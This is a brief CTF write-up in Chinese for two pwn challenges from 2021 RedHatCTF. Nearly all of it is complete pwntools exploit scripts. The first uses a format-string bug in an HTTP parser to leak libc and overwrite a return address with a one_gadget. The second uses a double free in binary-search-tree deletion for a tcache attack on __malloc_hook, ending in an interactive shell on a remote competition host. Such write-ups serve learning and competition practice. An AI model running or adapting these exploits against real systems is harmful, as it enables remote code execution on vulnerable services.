2021RedHatCTF

比赛的时候只做出来两题。

parse

http parser 有格式化字符串漏洞,改main函数返回地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/python

from pwn import *
context.log_level=logging.INFO
context.terminal=['tmux','new-window']
context.arch='amd64'
LOCAL=0

if LOCAL:
p=process('./chall')
else:
p=remote('47.105.94.48',12435)

padding='''POST /1 1
Content-Length: -1
\r
'''

idx=6+0xeb

content=f'%{idx}$lld'.ljust(0x100)

p.sendlineafter('> ',padding+content)
leak=int(p.recvline().decode())
p.success('leak: '+hex(leak))
base=leak-(0x7ffff7a05b97-0x7ffff79e4000)
p.success('base: '+hex(base))



idx=6+0x03
content=f'%{idx}$lld'.ljust(0x100)

p.sendlineafter('> ',padding+content)
leak=int(p.recvline().decode())
p.success('leak: '+hex(leak))
ret_addr=leak+(0x7fffffffe268-0x7fffffffdb7f)
p.success('ret_addr: '+hex(ret_addr))

onegadget=base+0x4f3c2
p.success('onegadget: '+hex(onegadget))


idx=6+0x54
payload=f'%1${((onegadget>>0)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr)
p.sendlineafter('> ',padding.encode()+b' '+payload)

payload=f'%1${((onegadget>>8)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+1)
p.sendlineafter('> ',padding.encode()+b' '+payload)

payload=f'%1${((onegadget>>8*2)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+2)
p.sendlineafter('> ',padding.encode()+b' '+payload)


payload=f'%1${((onegadget>>8*3)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+3)
p.sendlineafter('> ',padding.encode()+b' '+payload)


payload=f'%1${((onegadget>>8*4)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+4)
p.sendlineafter('> ',padding.encode()+b' '+payload)

payload=f'%1${((onegadget>>8*5)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+5)
p.sendlineafter('> ',padding.encode()+b' '+payload)

p.sendline('')
p.sendlineafter(':','/bin/bash')
# attach(p,'b *$rebase(0x137D)\nc')


p.interactive()

manager

二叉搜索树删除只有一个孩子的节点时发生double free,tcache attack。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

#!/usr/bin/python

from pwn import *
context.log_level=logging.DEBUG
context.terminal=['tmux','new-window']
context.arch='amd64'
LOCAL=0

if LOCAL:
p=process('./chall')
else:
p=remote('47.105.94.48',12243)

def add(key):
p.sendlineafter('> ','1')
p.sendlineafter('> ',str(key))
p.sendlineafter('> ','10')
p.sendlineafter('> ',str(key))

def show():
p.sendlineafter('> ','3')


def delete(key):
p.sendlineafter('> ','2')
p.sendlineafter('> ',str(key))

p.sendlineafter('> ','1')
p.sendlineafter('> ','0')
p.sendlineafter('> ',str(0x500))
p.sendlineafter('> ','')
add(1)
delete(0)
delete(1)
p.sendlineafter('> ','1')
p.sendlineafter('> ','0')
p.sendlineafter('> ',str(0x500))
p.sendlineafter('> ','')
show()
p.recvuntil('content:')
leak=u64(p.recv(6).ljust(8,b'\x00'))
p.success('leak: '+hex(leak))
base=leak-(0x7ffff7dcfc0a-0x7ffff79e4000)
p.success('base: '+hex(base))
malloc_hook=base+(0x7ffff7dcfc30-0x7ffff79e4000)
free_hook=base+(0x7ffff7dd18e8-0x7ffff79e4000)
one_gadget=base+0x10a45c # 0x4f365 0x4f3c2 0x10a45c
delete(0)
show()

add(4)
add(1)
add(3)
add(2)
add(0)
delete(1)
show()


p.sendlineafter('> ','1')
p.sendlineafter('> ','12') # key
p.sendlineafter('> ','8') # len
p.sendlineafter('> ',p64(malloc_hook-8)) #content

p.sendlineafter('> ','1')
p.sendlineafter('> ','13') # key
p.sendlineafter('> ','8') # len
p.sendlineafter('> ',p64(0xdeadbeef)) #content

realloc=base+(0x7ffff7a7cca0-0x7ffff79e4000)

p.sendlineafter('> ','1')
p.sendlineafter('> ','14') # key
p.sendlineafter('> ','16') # len
p.sendlineafter('> ',p64(one_gadget)+p64(realloc+10)) #content

# attach(p)
p.sendlineafter('> ','1')
p.sendlineafter('> ','133') # key
p.interactive()